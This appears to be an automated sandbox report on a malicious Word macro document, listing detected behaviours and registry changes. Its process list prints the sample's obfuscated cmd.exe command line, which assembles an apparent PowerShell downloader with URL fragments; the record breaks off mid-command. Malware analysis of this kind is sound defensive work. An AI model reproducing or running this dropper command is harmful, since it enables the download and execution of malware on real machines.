Analysis Overview
SHA256
ff717fe800f0aaf182856e2f7cfda5ec0744d0f5f591fce6e6b07e67aecd8bcc
Threat Level: Known bad
The file 747c9d7f8042899383819dbfa708255b_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Office macro that triggers on suspicious action
Suspicious Office macro
Command and Scripting Interpreter: PowerShell
Drops file in Windows directory
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Enumerates system info in registry
Checks processor information in registry
Suspicious use of WriteProcessMemory
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-26 05:39
Signatures
Office macro that triggers on suspicious action
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious Office macro
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-26 05:39
Reported
2024-05-26 05:41
Platform
win7-20240221-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | N/A | \??\c:\windows\SysWOW64\cmd.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohevi.dll" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\747c9d7f8042899383819dbfa708255b_JaffaCakes118.doc"
C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
\??\c:\windows\SysWOW64\cmd.exe
c:\JwkclkufWsrIUT\bTqhDQLzbozMvE\zwqQtdtioNp\..\..\..\windows\system32\cmd.exe /C"s^et ^PI^3=^W&&^s^e^t ^ZN^UW=^m&&^se^t ^dq^z=^iO^I&&^se^t ^5H^Mw=^$&&s^e^t ^h^a=n&&^se^t mS^j^o=n^s&&s^e^t O8r^q=e^a&&^se^t u^o^4=^p&&s^e^t ^h^k=N&&^s^et NrVj=@h^t^tp^:&&^se^t ^Snj^k=^d&&^se^t ^oe^Z^J= ^ ^ ^ &&^se^t q^0^k=^ak^}&&s^e^t N^H=^l&&^set B^g=^t&&^s^e^t ^AHl4=h^t^t&&^set ^z^d=^Hr^e&&^s^et ^P^Uu=^G^A&&^s^et ^4r^G=w^t&&s^e^t 5^t=^a&&^s^et nV^m^z=^,&&^se^t ^8^0v=^ &&^se^t ^DP^FZ=^'&&^s^e^t ^QR=ZRS&&s^e^t pCV=c&&^s^e^t ^UM=^o&&s^e^t L^s=^@^h&&^s^et ^z^l^p=}^ &&^s^e^t O^z=^ ^= &&^s^et ^3^ZdR=^d&&^se^t ^L^k^2^K=^@&&^s^e^t ^SR=^.t^y^p&&s^e^t UnN=m/^K^P&&s^e^t ^uj^P=o&&^s^e^t ^L^Dt=^$^j^i&&^s^e^t nR^l=^e&&s^e^t v^8^5=^E&&^s^e^t ^0m=://&&s^e^t ^T^Q=^e^s&&^s^et ^Q4=^DRn^G'^.&&s^e^t s^z^O=^l/&&^s^e^t ^LC^S=^3&&s^e^t ^2^H=^p^o&&^s^e^t ^U^H=^p&&s^e^t 4^U^D^8=^o&&^se^t ^Z^E^Xk=(^$&&^s^et ^7^9D=/&&^s^e^t ^5^P^o=^Wb&&^s^e^t V^M=^tr&&^s^et ^I^1v=u^d^s&&^s^et w^S^E==^ &&s^e^t a^7^m=^h&&set ^I^t^Z=^-c&&^se^t cb1=^t&&s^e^t ^3^J^A=^'&&^s^et ^t^y=^p:&&^s^et s^8=^=N&&s^e^t N^x=^p^ow&&s^e^t ^t^L^j=^s&&^se^t D^d^5=^.&&^se^t t^l=^h^{^}&&s^e^t ^S^xLC=^0)^;&&s^e^t ^7I^d=^$^d^P^f&&^s^et ^d^Z=()^;&&^s^et ^b^T= ^ &&^s^et ^4^hy=^ &&^s^et A^I^ET=)&&^se^t ^3^zcn=^-&&^se^t ^8^1^X=^s &&^s^et ^4f^o=^ &&^s^e^t ^a^erZ=^i&&^se^t v^d^uH=^a&&s^et ^8^PW=c^h^y&&^s^et ^sE^K^p=^P&&^se^t ^B^Q=m^s&&s^e^t n^9=t&&^s^et ^Ms^p^h=^;&&^s^e^t U^y=^f&&^s^e^t u^3^0=^ht&&s^e^t ^I^aJ=^'&&s^e^t 0^p=y{^$^j&&^s^e^t ^S^o^3=^b&&^se^t R^sc^D=^O&&^s^e^t 3^Z=^en^u^y&&^se^t n^3=^l^e^.&&^s^et ^P^D=^ &&^s^e^t ^I^k^qV=v&&^s^et ^op^k=^'&&^set lN=^p&&^s^e^t ^DT^LR=e^X&&^s^et a^oe^D=^m&&^se^t ^p^Y^o^D=^q&&^s^e^t i^m=H^j&&^s^e^t A^0Z^L=av^et&&s^e^t ^3^g^W^1=^;$&&^s^e^t 3S^B^M=^$^j&&^se^t b^HA^L=^=&&^s^et wtN=^G^e&&^se^t Q^LT^y=^l^htt^p^'&&^s^et ^dw9=^t^T^e&&^se^t n^W^L=^m/&&s^e^t c^9^M=^m&&^s^et ^D0=^1^;&&^se^t ^S^s=^d&&^s^et M^g^o=c^h&&^s^et ^3^x=^.^wr&&s^e^t ^W^wf=^5^Y^b&&^s^e^t R^Gv^Q=P&&s^e^t ^Il^M^q=^f.^s&&^s^et ^l^T^4=x^m&&s^e^t ^qN=6^K^p&&s^e^t ^B^DI^J=^ &&^s^et ^q^UGd=.co&&^s^e^t ^Dci^4=^e^'&&^se^t ^5^p^7=^in&&^s^e^t W^L^e=^m^ &&s^e^t C^8^f=^e&&s^e^t ^27=^A^eEc@&&^se^t ^S^i^t=n&&s^e^t ^Ur^Lz=^ &&s^e^t r^a=^t&&^s^et p^d^W=^$&&se^t ^Sp^D=v^t&&^s^et C^k^4=^e&&s^e^t n^tR=^o&&^s^e^t ^Bnr=^d&&s^e^t RVNp=^s&&^s^e^t ^uK^O^b=^.c^o&&^s^et 